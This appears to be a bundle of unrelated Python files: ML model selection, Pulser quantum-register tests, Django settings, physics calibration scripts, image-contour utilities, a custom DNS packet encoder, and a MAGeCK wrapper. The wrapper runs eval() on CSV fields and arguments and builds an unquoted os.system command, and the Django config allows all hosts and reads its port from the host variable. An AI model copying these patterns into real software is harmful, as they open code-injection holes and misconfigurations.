self.xgboost= self.GetBestParamsForXgboost(train_x,train_y)
self.PredictionXgboost = self.xgboost.predict(test_x) # Predictions using the XGBoost Model
if len(test_y.unique()) == 1: #if there is only one label in y, then roc_auc_score returns error. We will use accuracy in that case
self.XgboostScore = accuracy_score(test_y, self.PredictionXgboost)
self.logger.log(self.file, 'Accuracy for XGBoost:' + str(self.XgboostScore)) # Log AUC
else:
self.XgboostScore = roc_auc_score(test_y, self.PredictionXgboost) # AUC for XGBoost
self.logger.log(self.file, 'AUC for XGBoost:' + str(self.XgboostScore)) # Log AUC
# create best model for Random Forest
self.random_forest=self.GetBestParamsForRandomForest(train_x,train_y)
self.PredictionRandomForest=self.random_forest.predict(test_x) # prediction using the Random Forest Algorithm
if len(test_y.unique()) == 1:#if there is only one label in y, then roc_auc_score returns error. We will use accuracy in that case
self.random_forest_score = accuracy_score(test_y,self.PredictionRandomForest)
self.logger.log(self.file, 'Accuracy for RF:' + str(self.random_forest_score))
else:
self.random_forest_score = roc_auc_score(test_y, self.PredictionRandomForest) # AUC for Random Forest
self.logger.log(self.file, 'AUC for RF:' + str(self.random_forest_score))
#comparing the two models
if(self.random_forest_score < self.XgboostScore):
return 'XGBoost',self.xgboost
else:
return 'RandomForest',self.random_forest
except Exception as e:
self.logger.log(self.file,'Exception occured in GetBestModel method of the ModelFinder class. Exception message: ' + str(e))
self.logger.log(self.file,'Model Selection Failed. Exited the GetBestModel method of the ModelFinder class')
raise Exception()
|
# Copyright 2020 Pulser Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from hashlib import sha256
from unittest.mock import patch
import numpy as np
import pytest
from pulser.register import Register, Register3D
from pulser.register.register_layout import RegisterLayout
from pulser.register.special_layouts import (
SquareLatticeLayout,
TriangularLatticeLayout,
)
@pytest.fixture
def layout():
return RegisterLayout([[0, 0], [1, 1], [1, 0], [0, 1]], slug="2DLayout")
@pytest.fixture
def layout3d():
return RegisterLayout([[0, 0, 0], [1, 1, 1], [0, 1, 0], [1, 0, 1]])
def test_creation(layout, layout3d):
with pytest.raises(
ValueError, match="must be an array or list of coordinates"
):
RegisterLayout([[0, 0, 0], [1, 1], [1, 0], [0, 1]])
with pytest.raises(
ValueError, match="must be an array or list of coordinates"
):
RegisterLayout([0, 1, 2])
with pytest.raises(ValueError, match="size 2 or 3"):
RegisterLayout([[0], [1], [2]])
with pytest.raises(
ValueError,
match="All trap coordinates of a register layout must be unique.",
):
RegisterLayout([[0, 1], [0.0, 1.0]])
assert np.all(layout.coords == [[0, 0], [0, 1], [1, 0], [1, 1]])
assert np.all(
layout3d.coords == [[0, 0, 0], [0, 1, 0], [1, 0, 1], [1, 1, 1]]
)
assert layout.number_of_traps == 4
assert layout.dimensionality == 2
for i, coord in enumerate(layout.coords):
assert np.all(layout.traps_dict[i] == coord)
def test_slug(layout, layout3d):
assert layout.slug == "2DLayout"
assert layout3d.slug is None
assert str(layout) == "2DLayout"
assert str(layout3d) == repr(layout3d)
def test_register_definition(layout, layout3d):
with pytest.raises(ValueError, match="must be a unique integer"):
layout.define_register(0, 1, 1)
with pytest.raises(ValueError, match="correspond to the ID of a trap"):
layout.define_register(0, 4, 3)
with pytest.raises(ValueError, match="must be a sequence of unique IDs"):
layout.define_register(0, 1, qubit_ids=["a", "b", "b"])
with pytest.raises(ValueError, match="must have the same size"):
layout.define_register(0, 1, qubit_ids=["a", "b", "c"])
assert layout.define_register(0, 1) == Register.from_coordinates(
[[0, 0], [0, 1]], prefix="q", center=False
)
assert layout3d.define_register(0, 1) == Register3D(
{"q0": [0, 0, 0], "q1": [0, 1, 0]}
)
reg2d = layout.define_register(0, 2)
assert reg2d._layout_info == (layout, (0, 2))
with pytest.raises(ValueError, match="dimensionality is not the same"):
reg2d._validate_layout(layout3d, (0, 2))
with pytest.raises(
ValueError, match="Every 'trap_id' must be a unique integer"
):
reg2d._validate_layout(layout, (0, 2, 2))
with pytest.raises(
ValueError, match="must be equal to the number of atoms"
):
reg2d._validate_layout(layout, (0,))
with pytest.raises(
ValueError, match="don't match this register's coordinates"
):
reg2d._validate_layout(layout, (0, 1))
with pytest.raises(TypeError, match="cannot be rotated"):
reg2d.rotate(30)
def test_draw(layout, layout3d, patch_plt_show):
layout.draw()
with patch("matplotlib.pyplot.savefig"):
layout.draw(fig_name="my_registerlayout.pdf")
layout3d.draw()
layout3d.draw(projection=False)
with patch("matplotlib.pyplot.savefig"):
layout3d.draw(fig_name="my_registerlayout.pdf")
def test_repr(layout):
hash_ = sha256(bytes(2))
hash_.update(layout.coords.tobytes())
assert repr(layout) == f"RegisterLayout_{hash_.hexdigest()}"
def test_static_hash(layout):
int_hash = int.from_bytes(layout._safe_hash(), byteorder="big")
assert layout.static_hash() == f"{int_hash:x}"
assert repr(layout) == f"RegisterLayout_{layout.static_hash()}"
def test_eq(layout, layout3d):
assert RegisterLayout([[0, 0], [1, 0]]) != Register.from_coordinates(
[[0, 0], [1, 0]]
)
assert layout != layout3d
layout1 = RegisterLayout([[0, 0], [1, 0]])
layout2 = RegisterLayout([[1, 0], [0, 0]])
assert layout1 == layout2
assert hash(layout1) == hash(layout2)
def test_traps_from_coordinates(layout):
assert layout._coords_to_traps == {
(0, 0): 0,
(0, 1): 1,
(1, 0): 2,
(1, 1): 3,
}
assert layout.get_traps_from_coordinates(
(0.9999995, 0.0000004), (0, 1), (1, 1)
) == [2, 1, 3]
with pytest.raises(ValueError, match="not a part of the RegisterLayout"):
layout.get_traps_from_coordinates((0.9999994, 1))
def test_square_lattice_layout():
square = SquareLatticeLayout(9, 7, 5)
assert str(square) == "SquareLatticeLayout(9x7, 5.0µm)"
assert square.square_register(3) == Register.square(
3, spacing=5, prefix="q"
)
# An even number of atoms on the side won't align the center with an atom
assert square.square_register(4) != Register.square(
4, spacing=5, prefix="q"
)
with pytest.raises(ValueError, match="'8x8' array doesn't fit"):
square.square_register(8)
assert square.rectangular_register(3, 7, prefix="r") == Register.rectangle(
3, 7, spacing=5, prefix="r"
)
with pytest.raises(ValueError, match="'10x3' array doesn't fit"):
square.rectangular_register(10, 3)
def test_triangular_lattice_layout():
tri = TriangularLatticeLayout(50, 5)
assert str(tri) == "TriangularLatticeLayout(50, 5.0µm)"
assert tri.hexagonal_register(19) == Register.hexagon(
2, spacing=5, prefix="q"
)
with pytest.raises(
ValueError,
match=re.escape(
"The desired register has more atoms (51) than there"
" are traps in this TriangularLatticeLayout (50)"
),
):
tri.hexagonal_register(51)
with pytest.raises(
ValueError, match="has more atoms than there are traps"
):
tri.rectangular_register(7, 8)
# Case where the register doesn't fit
with pytest.raises(ValueError, match="not a part of the RegisterLayout"):
tri.rectangular_register(8, 3)
# But this fits fine, though off-centered with the Register default
assert tri.rectangular_register(5, 5) != Register.triangular_lattice(
5, 5, spacing=5, prefix="q"
)
def test_mappable_register_creation():
tri = TriangularLatticeLayout(50, 5)
with pytest.raises(ValueError, match="greater than the number of traps"):
tri.make_mappable_register(51)
mapp_reg = tri.make_mappable_register(5)
assert mapp_reg.qubit_ids == ("q0", "q1", "q2", "q3", "q4")
assert mapp_reg.find_indices(["q4", "q2", "q1", "q2"]) == [4, 2, 1, 2]
with pytest.raises(
ValueError, match="must be selected among pre-declared qubit IDs"
):
mapp_reg.find_indices(["q4", "q2", "q1", "q5"])
with pytest.raises(
ValueError, match="labeled with pre-declared qubit IDs"
):
mapp_reg.build_register({"q0": 0, "q5": 2})
with pytest.raises(ValueError, match="To declare 2 qubits"):
mapp_reg.build_register({"q0": 0, "q2": 2})
qubit_map = {"q0": 10, "q1": 49}
reg = mapp_reg.build_register(qubit_map)
assert reg == Register(
{"q0": tri.traps_dict[10], "q1": tri.traps_dict[49]}
)
names = ["q1", "q0", "q0"]
assert mapp_reg.find_indices(names) == reg.find_indices(names)
|
#!/usr/bin/env python
# -*-encoding:UTF-8-*-
from myutils.shortcuts import get_env
#
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': get_env("POSTGRES_HOST", "icqbpmssoj-postgres"),
'PORT': get_env("POSTGRES_HOST", "5432"),
'NAME': get_env("POSTGRES_DB"),
'USER': get_env("POSTGRES_USER"),
'PASSWORD': get_env("POSTGRES_PASSWORD")
}
}
#
REDIS_CONF = {
"host": get_env("REDIS_HOST", "icqbpmssoj-redis"),
"port": get_env("REDIS_PORT", "6379")
}
# if DEBUG is False, you also need to properly set the ALLOWED_HOSTS setting.
# Failing to do so will result in all requests being returned as “Bad Request (400)”.
DEBUG = False
#
ALLOWED_HOSTS = ['*']
DATA_DIR = "/data"
|
import postvdm
import pandas as pd
import pickle as pkl
import os
import re
import json
# automation = '/brildata/vdmoutput/Automation/'
automation = '/brildata/vdmoutput18/'
detectors = ['PLT','BCM1FPCVD','BCM1FSI','HFET','HFOC']
for scan in os.listdir(automation+'Analysed_Data/'):
if int(scan[:4])<6699:continue
try:
if os.path.exists(automation+'Analysed_Data/' +scan+'/cond/Scan_' + scan[:4] + '.pkl'):
with open(automation+'Analysed_Data/' +scan+'/cond/Scan_' + scan[:4] + '.pkl') as pf:
scanfile = pkl.load(pf)
else:
with open(automation+'Analysed_Data/' +scan+'/cond/Scan_' + scan[:4] + '.json') as jf:
scanfile = json.load(jf)
for detector in detectors:
try:
if detector=='BCM1FPCVD' and not os.path.exists(automation+'Analysed_Data/'+scan+'/'+detector):
detector = 'BCM1F'
files = os.listdir(automation+'Analysed_Data/'+scan+'/'+detector+'/results/BeamBeam/')
lumicals = [f for f in files if 'LumiCalibration' in f and 'pkl' in f]
for lumical in lumicals:
fit = re.match('LumiCalibration_[A-Z1]*_([A-Za-z]*)_\d{4}\.pkl',lumical).groups()[0]
fitres = fit+'_FitResults.pkl'
with open(automation+'Analysed_Data/'+scan+'/'+detector+'/results/BeamBeam/'+fitres) as tempfile:
temp = pkl.load(tempfile)
fits = pd.DataFrame(temp[1:],columns=temp[0])
with open(automation+'Analysed_Data/'+scan+'/'+detector+'/results/BeamBeam/'+lumical) as tempfile:
temp = pkl.load(tempfile)
cals = pd.DataFrame(temp[1:],columns=temp[0])
postvdm.PostOutput(fits,cals,scanfile['ScanTimeWindows'],int(scanfile['Fill']),\
scanfile['Run'][0],False,scan,detector,fit,scanfile['Angle'],\
automation_folder=automation,post=True)
except Exception as e:
print(e)
# print fit, scan, detector
except Exception as e:
print(e) |
import os
import pathlib
import sys
import unittest
sys.path.append("..")
DATA_DIR = "%s/../../data/test" % pathlib.Path(__file__).parent.absolute()
WORK_DIR = "/tmp/squad-tests"
class TestAll(unittest.TestCase):
def test_train(self):
from src.squad.train import train
squad_path = WORK_DIR
sent_size_th = "10"
ques_size_th = "10"
num_epochs = "1"
num_steps = "1"
eval_period = "1"
save_period = "1"
learning_rate = "0.5"
batch_size = "60"
hidden_size = "100"
var_decay = "0.999"
training_mode = "span"
model_path = WORK_DIR
device = "/cpu:0"
device_type = "gpu"
num_gpus = "1"
try:
from multiprocessing import Process
args = (
squad_path,
sent_size_th,
ques_size_th,
num_epochs,
num_steps,
eval_period,
save_period,
learning_rate,
batch_size,
hidden_size,
var_decay,
training_mode,
device,
device_type,
num_gpus,
model_path,
)
p = Process(target=train, args=args)
p.start()
p.join()
except SystemExit:
print("Finished successfully!")
# Check model directory has all files
self.assertIn("out", os.listdir(model_path))
self.assertIn("squad", os.listdir(model_path + "/out"))
if __name__ == "__main__":
unittest.main()
|
import logging
import os
import sys
import cv2
import imutils
import matplotlib.patches as patches
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from matplotlib.path import Path
from shapely.affinity import translate, scale
from skimage import measure
import time
from configuration import Config as cfg
from dto import BoundingBox, Contour
logger = logging.getLogger(__name__)
def init_logger():
root = logging.getLogger()
root.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
ch.setLevel(logging.ERROR)
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
formatter = logging.Formatter('%(name)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
logging.getLogger("PIL.PngImagePlugin").setLevel(logging.INFO)
if False:
logging.getLogger("card_classifier_trace").setLevel(logging.INFO)
logging.getLogger("number_reader").setLevel(logging.INFO)
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
logger.debug('%r %2.2f ms' % \
(method.__name__, (te - ts) * 1000))
return result
return timed
def diff_polygons(contour_1, contour_2, scale_polygons=True):
"""
:return: Total of non intersecting area
"""
if contour_1 is None or contour_2 is None:
return 10000000000000
poly1 = contour_1.polygon
poly2 = contour_2.polygon
if not poly1.is_valid or not poly2.is_valid:
logger.warning("Polygons not valid")
return 10000000000000
minx1, miny1, maxx1, maxy1 = poly1.bounds
minx2, miny2, maxx2, maxy2 = poly2.bounds
width1 = maxx1 - minx1
width2 = maxx2 - minx2
height1 = maxy1 - miny1
height2 = maxy2 - miny2
if scale_polygons:
poly2 = scale(geom=poly2, xfact=width1 / width2, yfact=height1 / height2, origin='centroid')
poly1 = translate(poly1, xoff=-poly1.bounds[0], yoff=-poly1.bounds[1])
poly2 = translate(poly2, xoff=-poly2.bounds[0], yoff=-poly2.bounds[1])
intersecting_area = poly1.intersection(poly2).area
return poly1.area + poly2.area - 2 * intersecting_area
def display_image_with_contours(grey_array, contours):
# Display the image and plot all contours found
fig, ax = plt.subplots()
if grey_array is not None:
ax.imshow(grey_array, interpolation='nearest', cmap=plt.cm.gray)
for n, contour in enumerate(contours):
ax.plot(contour[:, 1], contour[:, 0], linewidth=2)
ax.axis('image')
ax.set_xticks([])
ax.set_yticks([])
plt.show()
def rgb_yx_array_to_grayscale(array):
image = Image.fromarray(array)
grey_image = image.convert('L')
return np.array(grey_image)
def card_to_grayscale_2d_array(image):
grey_scale = image.convert('L')
grey_array = np.array(grey_scale)
# grey_array = imresize(arr=grey_array, size=(cfg.CARD_HEIGHT_PIXELS, cfg.CARD_WIDTH_PIXELS))
return grey_array
def trim_main_window_image_array(image_array):
image_array = image_array[cfg.ZYNGA_WINDOW.min_y:cfg.ZYNGA_WINDOW.max_y,
cfg.ZYNGA_WINDOW.min_x:]
left_index = 0
for i in range(0, 300):
column_sum = np.sum(image_array[:, i])
if column_sum > 0:
break
left_index = i
image_array = image_array[:, left_index:]
return image_array
def get_game_area_as_2d_array(screenshot_file_path):
image = Image.open(screenshot_file_path)
image_array = np.array(image)
return trim_main_window_image_array(image_array)
def find_contours(
grey_array, min_width=5, max_width=15,
min_height=5, max_height=100,
value_threshold=150,
fully_connected="low",
display=False
):
"""
:return: iterable of contours in card
"""
# grey_array[grey_array < 150] = 0
# grey_array[grey_array >= 150] = 255
if grey_array is None or grey_array.ndim != 2:
logger.warning("Not a valid array passed to find_contours")
return
# http://scikit-image.org/docs/dev/auto_examples/edges/plot_contours.html?highlight=find_contours
all_contours = measure.find_contours(grey_array, level=value_threshold, fully_connected=fully_connected)
# Todo find inner shapes and subtract from polygon
contour_list = []
for points_array in all_contours:
b = BoundingBox()
b.min_y, b.min_x = np.min(points_array, axis=0)
b.max_y, b.max_x = np.max(points_array, axis=0)
c = Contour()
c.bounding_box = b
if not np.array_equal(points_array[0], points_array[-1]):
points_array = np.append(points_array, np.expand_dims(points_array[0], axis=0), axis=0)
c.set_points_array(points_array)
contour_list.append(c)
contour_list = sorted(contour_list, key=lambda x: x.bounding_box.min_x)
if display:
display_image_with_contours(grey_array, [c.points_array for c in contour_list])
for idx, c in enumerate(contour_list):
if c is None:
continue
width = c.bounding_box.max_x - c.bounding_box.min_x
height = c.bounding_box.max_y - c.bounding_box.min_y
if width < min_width or width > max_width:
# logger.debug(f"Skipping contour #{idx}: {c} due to width")
continue
if height < min_height or height > max_height:
# logger.debug(f"Skipping contour #{idx}: {c} due to height")
continue
# print(f"Found contour @ {min_x},{min_y} Width={width} Height={height} Numpoints={len(contour)}")
if display:
# display_image_with_contours(grey_array, [c.points_array ])
pass
if not c.polygon.is_valid:
logger.warning("Polygon is not valid")
continue
# See if any additional contours fit 100% inside
for idx2 in range(idx + 1, len(contour_list)):
c2 = contour_list[idx2]
if c2 is None:
continue
if c2.polygon is not None and c.polygon.contains(c2.polygon) and c2.polygon.is_valid:
c.polygon = c.polygon.difference(c2.polygon)
# don't return it in future runs
contour_list[idx2] = None
elif c2.bounding_box.min_x > c.bounding_box.max_x:
break
yield c
def generate_points_list(width, height):
"""
returns a 2d array, x,y of all points in an
integer grid of width/height
"""
x, y = np.meshgrid(np.arange(width), np.arange(height))
x, y = x.flatten(), y.flatten()
points = np.vstack((x, y)).T
return points
def extract_polygon_mask_from_contour(contour, width, height, all_grid_points_list):
"""
:param contour: a y/x list of points
:return: An image of height x width with True where the pixel is in the
polygon defined by the contour
"""
# https://stackoverflow.com/questions/4857927/swapping-columns-in-a-numpy-array
contour_xy = contour[:, [1, 0]]
# https://matplotlib.org/api/path_api.html#matplotlib.path.Path
path = Path(contour_xy)
grid = path.contains_points(all_grid_points_list, radius=-1)
grid = grid.reshape((height, width))
return grid
def extract_image_with_mask(image, boolean_mask, background_color):
"""
:param image: 2d numpy array, y x
:param boolean_mask: same size as image, True to extract
:param background_color what color to set where boolean_mask is False
:return: copy of image
"""
r_image = image.copy()
r_image[np.logical_not(boolean_mask)] = background_color
return r_image
def clip_and_save(p_orig_image, x, y, w, h, file_name):
"""
:param p_orig_image: cv2 image with dimensions [y][x][RGB] = 0-255
:param contour_to_crop:
:param file_name:
:return:
"""
os.makedirs(cfg.EXTRACTED_IMAGES_PATH, exist_ok=True)
crop_img = p_orig_image[y:y + h + 1, x:x + w + 1]
# save the result
cv2.imwrite(os.path.join(cfg.EXTRACTED_IMAGES_PATH, file_name), crop_img)
|
#!/usr/bin/python
import os, struct, socket, time, random, select
from dijkstra import getBestServer
def s(i):
return struct.pack('>H', i)
def b(i):
return struct.pack('>B', i)
def us(i):
return struct.unpack('>H', i)[0]
def ub(i):
return struct.unpack('>B', i)[0]
SERVERS = []
SERV_CURR = 0
# DEFAULTS
TRANS_ID = us(os.urandom(2))
FLAGS_QR = 0 #Query
FLAGS_Opcode = 0 #Std query
FLAGS_AA = 1 #is an authority
FLAGS_TC = 0 #not truncated
FLAGS_RD = 0 #not asking for recursion
FLAGS_RA = 0 #recursion not allowed (or is a request)
FLAGS_Zero = 0 # always zero
FLAGS_RCode = 0 # no errors
FLAGS = 0
NUM_QUESTIONS = 1
NUM_ANSWERS = 0
NUM_AUTHORITY = 0
NUM_ADDITIONAL = 0
QType = 1 # A record
QClass = 1 # IN
LOG_FILE = None
def serverSetup(servers_file, log):
global LOG_FILE
global SERVERS
SERVERS = open(servers_file).read().split('\n')
if SERVERS[-1] == '':
SERVERS = SERVERS[:-1]
LOG_FILE = open(log, 'w', 0)
def genFlags(query):
global FLAGS_QR, NUM_ANSWERS, FLAGS
if not query:
FLAGS_QR = 1
NUM_ANSWERS = 1
FLAGS_B1 = FLAGS_QR<<7 | FLAGS_Opcode <<3 | FLAGS_AA <<2 | FLAGS_TC <<1 | FLAGS_RD
FLAGS_B2 = FLAGS_RA<<7 | FLAGS_RCode
FLAGS = FLAGS_B1<<8 | FLAGS_B2
def genMessage(query_str, query=1, ROUND_ROBIN=0, servers_file="", lsa_file="", addr="", logfile=None):
global SERV_CURR
if not query and len(SERVERS) == 0:
serverSetup(servers_file, logfile)
genFlags(query)
message = s(TRANS_ID)+s(FLAGS)+s(NUM_QUESTIONS)+s(NUM_ANSWERS)+s(NUM_AUTHORITY)+ \
s(NUM_ADDITIONAL)
# Calc lengths for Query string
lens = []
i = 0
while i in xrange(len(query_str)):
k = 0
for j in xrange(i,len(query_str)):
if query_str[j] == '.':
lens.append(k)
break
k += 1
i = j+1
total_read = sum(lens)+len(lens)
lens.append(len(query_str)-total_read)
# Insert lengths and names into message
message += b(lens[0])
l = 1
for i,c in enumerate(query_str):
if c == '.':
message += b(lens[l])
l += 1
else:
message += struct.pack('c',c)
message += b(0)
message += s(QType)
message += s(QClass)
# build RR's
RR_ADDR = ""
if not query:
# # Insert lengths and names into message
# message += b(lens[0])
# l = 1
# for i,c in enumerate(query_str):
# if c == '.':
# message += b(lens[l])
# l += 1
# else:
# message += struct.pack('c',c)
# message += b(0)
RR_NAME = 49164 #C0 0C
message += s(RR_NAME)
RR_QTYPE = 1 #A record
RR_QCLASS = 1 #IN
RR_TTL = 0 # no caching
RR_DATALENGTH = 4
if ROUND_ROBIN:
RR_ADDR = SERVERS[SERV_CURR]
SERV_CURR = (SERV_CURR + 1) % len(SERVERS)
else:
RR_ADDR = getBestServer(addr[0], SERVERS, lsa_file)
message += s(RR_QTYPE)+s(RR_QCLASS) + \
struct.pack('>I',RR_TTL) + s(RR_DATALENGTH)
RR_ADDR = [int(float(a)) for a in RR_ADDR.split('.')]
for a in RR_ADDR:
message += b(a)
t = int(time.time())
out_addr = '.'.join([str(r) for r in RR_ADDR])
log_s= ' '.join([str(t),addr[0],query_str,out_addr])
print log_s
LOG_FILE.write(log_s+'\n')
return (message, RR_ADDR)
def parseMessage(data, query=0):
global TRANS_ID
R_TRANS_ID = us(data[0:2])
if query:
TRANS_ID = R_TRANS_ID
R_FLAGS = us(data[2:4])
R_FLAGS_B1 = R_FLAGS >> 8
R_FLAGS_B2 = R_FLAGS & 255
R_FLAGS_QR = (R_FLAGS_B1 & 128) >> 7
R_FLAGS_Opcode = (R_FLAGS_B1 & (15<<3)) >> 3
R_FLAGS_AA = (R_FLAGS_B1 & 4) >> 2
R_FLAGS_TC = (R_FLAGS_B1 & 2) >> 1
R_FLAGS_RD = (R_FLAGS_B1 & 1)
R_FLAGS_RA = (R_FLAGS_B2 & 128) >> 7
R_FLAGS_Zero = (R_FLAGS_B2 & (7<<4)) >> 4
R_FLAGS_RCode = R_FLAGS_B2 & 15
R_NUM_QUESTIONS = us(data[4:6])
R_NUM_ANSWERS = us(data[6:8])
R_NUM_AUTHORITY = us(data[8:10])
R_NUM_ADDITIONAL = us(data[10:12])
R_INPUT = []
i = 13
l = ub(data[12])
while l != 0:
R_INPUT += data[i]
i += 1
l -= 1
if l == 0:
l = ub(data[i])
i += 1
R_INPUT += '.'
R_INPUT = ''.join(R_INPUT[:-1])
R_QType = us(data[i:i+2]) # A record
i += 2
R_QClass = us(data[i:i+2]) # IN
i += 2
# print R_FLAGS_QR, R_FLAGS_Opcode, R_FLAGS_AA, R_FLAGS_TC, R_FLAGS_RD
# print R_FLAGS_RA, R_FLAGS_Zero, R_FLAGS_RCode
# print R_NUM_QUESTIONS, R_NUM_ANSWERS, R_NUM_AUTHORITY, R_NUM_ADDITIONAL
RR_ADDR = ""
RR_NAME = ""
if R_NUM_ANSWERS:
if us(data[i:i+2]) == 49164: # C0 0C
RR_NAME = us(data[i:i+2]) # should be C0 0C
i += 2
else:
l = ub(data[i])
i += 1
while l != 0:
RR_NAME += data[i]
i += 1
l -= 1
if l == 0:
l = ub(data[i])
i += 1
RR_NAME += '.'
RR_NAME = ''.join(RR_NAME[:-1])
RR_TYPE = us(data[i:i+2]) # A record
i += 2
RR_CLASS = us(data[i:i+2]) # IN
i += 2
RR_TTL = (us(data[i:i+2])<<8) + (us(data[i+2:i+4]))
i += 4
RR_DL = us(data[i:i+2])
i += 2
addr = [ub(data[i:i+1]),ub(data[i+1:i+2]),ub(data[i+2:i+3]),ub(data[i+3:i+4])]
addr = [str(a) for a in addr]
RR_ADDR = '.'.join(addr)
# print RR_NAME, RR_TYPE, RR_CLASS, RR_TTL, RR_DL
flags = {}
if not query:
flags = {'sent_trans_id' : TRANS_ID, 'recv_trans_id' : R_TRANS_ID, 'qr' : R_FLAGS_QR,
'opcode' : R_FLAGS_Opcode, 'aa' : R_FLAGS_AA, 'tc' : R_FLAGS_TC, 'rd' : R_FLAGS_RD,
'ra' : R_FLAGS_RA, 'z' : R_FLAGS_Zero, 'rcode' : R_FLAGS_RCode,
'num_questions' : R_NUM_QUESTIONS, 'num_answers' : R_NUM_ANSWERS,
'num_authority' : R_NUM_AUTHORITY, 'num_additional' : R_NUM_ADDITIONAL,
'qtype' :R_QType, 'qclass' : R_QClass, 'rr_name' : RR_NAME, 'rr_qtype' : RR_TYPE,
'rr_qclass' : RR_CLASS, 'rr_ttl' : RR_TTL, 'rr_dl' : RR_DL}
return (R_INPUT, RR_ADDR, flags)
def sendDNSQuery(query, local_ip, server_ip, server_port):
message = genMessage(query, 1)[0]
dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dns_sock.bind((local_ip,0))
dns_sock.sendto(message, (server_ip, server_port))
dns_sock.setblocking(0)
data = []
for i in xrange(2):
ready = select.select([dns_sock], [], [], 1)
if ready[0]:
data, _ = dns_sock.recvfrom(1024)
break
if not data:
raise Exception("DNS server failed to respond")
return parseMessage(data, 0)
|
import io, os, csv, random
import sys
def prepareFile(filename, hdr):
#Count any lines before the headers (should be skipped)
f = io.open(filename)
skip_lines, line = 0, f.readline()
while hdr not in line and skip_lines < 100: skip_lines += 1; line = f.readline()
f.close()
if skip_lines >= 100:
raise Exception('Could not find line with header ' + hdr + ' in ' + filename)
#Check for comma vs tab delimited
delim = ',' if (filename.split('.')[-1] == 'csv') else '\t'
#Reopen the file and skip to the start of the data
f = io.open(filename); [f.readline() for i in range(skip_lines)]
return f, delim
def convertChars(rep):
for char in [' ','.',';',',']:
rep = rep.replace(char,'_')
return rep
def createDesignMatrixFile(repfile, rep_hdr, sample_hdr, ctrl_sample, outfile):
f, delim = prepareFile(repfile, rep_hdr)
rdr = csv.DictReader(f, delimiter=delim)
rep_map = {row[rep_hdr]: row[sample_hdr] for row in rdr}
cell_lines = [x for x in set([rep_map[x] for x in rep_map]) if x != ctrl_sample]
f.close()
fout = io.open(outfile, 'w')
fout.write(u'Samples\tbaseline\t%s\n' % '\t'.join(cell_lines))
for rep in rep_map:
fout.write(u'%s\t1\t%s\n' % (convertChars(rep), '\t'.join(['%d' % int(x==rep_map[rep]) for x in cell_lines])))
fout.close()
def formatCountFile( countfile, guidemappingfile, sgrna_hdr, gene_hdr, outprefix ):
delim = ',' if countfile[-4:]=='.csv' else '\t'
f = io.open(countfile); rdr = csv.DictReader(f, delimiter=delim)
guide_col = rdr.fieldnames[0]
has_gene_col = (rdr.fieldnames[1].upper() == 'GENE')
if has_gene_col and delim=='\t' and sum([convertChars(x) != x for x in rdr.fieldnames[1:]])==0: return countfile
if not has_gene_col:
fg = io.open(guidemappingfile)
fg_delim = ',' if guidemappingfile[-4:]=='.csv' else '\t'
guide_map = {row[sgrna_hdr]: row[gene_hdr] for row in csv.DictReader(fg, delimiter=fg_delim)}
fg.close()
newcountfile = outprefix + '_' + countfile.split('/')[-1][:-4] + '.txt'
fout = io.open(newcountfile, 'w')
fout.write(u'sgRNA\tgene\t%s\n' % '\t'.join([convertChars(x) for x in rdr.fieldnames[1+has_gene_col:]]))
for row in rdr:
if has_gene_col: gene = row[rdr.fieldnames[1]]
elif row[guide_col] not in guide_map:
continue
else: gene = guide_map[row[guide_col]]
try:
[eval(row[hdr]) for hdr in rdr.fieldnames[1+has_gene_col:]]
except:
print 'EXCEPTION IN ROW:', row
fout.write(u'%s\t%s\t%s\n' % (row[guide_col], gene, '\t'.join(row[hdr] for hdr in rdr.fieldnames[1+has_gene_col:])))
fout.close()
return newcountfile
if len(sys.argv) != 6:
print 'Usage: run_mageck_mle.py countfile replicatefile:rep_hdr:sample_hdr:ctrl_sample genemapfile:guide_hdr:gene_hdr outputprefix threads'
else:
#Parse arguments
countfile = sys.argv[1] #sgrna label is always in the first column, gene in the second
rep_toks = sys.argv[2].split(':')
if len(rep_toks) != 4:
raise Exception('Incorrect replicate file input: expecting "replicatefile:rep_hdr:sample_hdr:ctrl_sample" where replicatefile is a csv or tab delimited file mapping replicates to samples, rep_hdr and sample_hdr specify the column headers for the columns containing the replicate labels and sample labels respectively, and ctrl_sample specifies the name of the control sample')
replicatefile, rep_hdr, sample_hdr, ctrl_sample = rep_toks
guide_toks = sys.argv[3].split(':')
if len(guide_toks) != 3:
raise Exception('Incorrect guidemappingfile input: expecting "guidemappingfile:sgrna_hdr:gene_hdr" where guidemappingfile is a csv or tab delimited file mapping guides to genes, sgrna_hdr and gene_hdr specify the column headers for the columns containing the guide labels and gene labels respectively.')
guidemappingfile, sgrna_hdr, gene_hdr = guide_toks
outprefix = sys.argv[4]
outdir = '/'.join(outprefix.split('/')[:-1])
if outdir != '' and not os.path.isdir(outdir):
os.mkdir(outdir)
threads = eval(sys.argv[5])
#Create the design matrix file
designfile = outprefix + '_designmat.txt'
createDesignMatrixFile(replicatefile, rep_hdr, sample_hdr, ctrl_sample, designfile)
#Adjust the input file (if needed)
countfile = formatCountFile( countfile, guidemappingfile, sgrna_hdr, gene_hdr, outprefix )
#Run Mageck-MLE
cmd = "mageck mle -k %s -d %s -n %s --threads %d" % (countfile, designfile, outprefix, threads)
print cmd
os.system(cmd)
|
# ---------------------------------------------------------------------------
# Created by: Ryan Spies (rspies@lynkertech.com)
# Date: 6/9/2015
# UPDATED (10/14/2015): use a search cursor loop on a shapefile containing multiple basins
# extract_basin_gSSURGO_data.py
# Description: extract gSSURGO gridded soil data using basin shapefiles and write
# a land cover count summary to csv file
# NOTE: only runs one SSURGO raster (usually 1 file for each state) -> requires
# multiple runs for basins in more than one state
#
# Steps to set up run:
